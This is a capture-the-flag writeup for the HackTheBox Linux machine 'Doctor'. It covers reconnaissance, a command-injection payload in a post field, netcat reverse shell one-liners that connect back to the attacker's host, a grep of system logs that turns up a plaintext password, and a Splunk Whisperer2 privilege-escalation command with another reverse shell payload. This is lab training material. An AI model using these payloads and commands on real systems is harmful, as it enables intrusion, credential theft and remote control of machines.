HackTheBox Writeup — Doctor

Doctor, Linux, 10.10.10.209

Hack The Box is an online platform to test and advance your skills in penetration testing and cyber security.

Reconnaissance

Service enumeration with Nmap (TCP scan on all ports with version detection and scripts):

nmap -sT -p- -A 10.10.10.209

A domain name “doctors.htb” was found on the web application hosted on the “http://10.10.10.209” address:

Identified “doctors.htb” domain

No web server was accessible on “http://doctors.htb” so the file “/etc/hosts” had to be edited to resolve the domain to the “10.10.10.209” IP address:

10.10.10.209  doctors.htb

http://doctors.htb — Login page

A new user could be registered on the http://doctors.htb/register page

The account “l33t” had been created

The application allowed the users to create new posts which were visible on the main page.

New posts could be created under the http://doctors.htb/post/new page

Inspecting the HTML source code, led to the “http://doctors.htb/archive” page which reveled an XML output. The title of the previously created post was visible without sanitization inside the “<title>” elements. It was suspected that the application is vulnerable against Server Side Template
Injection. The attacker might be able to insert malicious payload into the template which is executed on server-side.

Exploitation

After several attempts, it was determined that the server was hosting a binary of Netcat Traditional.

Launching Netcat reverse shell on the targeted host:

nc.traditional -e /bin/sh [IPADDR] [PORT]

Opening a Netcat listener on the attacker’s host:

nc -nlvp [PORT]

After the adequate template engine was determined (Server Side Template Injection attacks), the following payload had to be injected as the content of a new post:

<img src=http://10.10.14.84/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.84'$IFS'4444')>

New post containing a Netcat reverse shell payload

After the reverse shell was created, an interactive Python-shell could be established on behalf of the “web@doctor” user:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Steps: 1. Netcat listener on the attacker’s host, 2. reverse Netcat payload injection, 3. Python shell migration

After user enumeration, the current user was a member of the “adm” group which is responsible for monitoring tasks. It turned out that the log files were accessible for this user. A quick search against sensitive information revealed a password in a log file:

grep -R -e 'password' /var/log/

Content of the “/var/log/apache2/backup” file

Identified password: Guitar123

User enumeration: ls /home; cat /etc/passwd | grep “/home”

Identified user: shaun

Switching to user “shaun” by using the discovered password “Guitar123”:

su shaun

User.txt was obtained

Privilege Escalation

The target was running a vulnerable version of Splunk Forwarder Instance on port 8089. A quick search revealed an exploit Splunk Whisperer2 which could be used to obtain a root shell:

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.84 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.84' '4443'"

Splunk exploit was executed

Reverse shell was created, root.txt obtained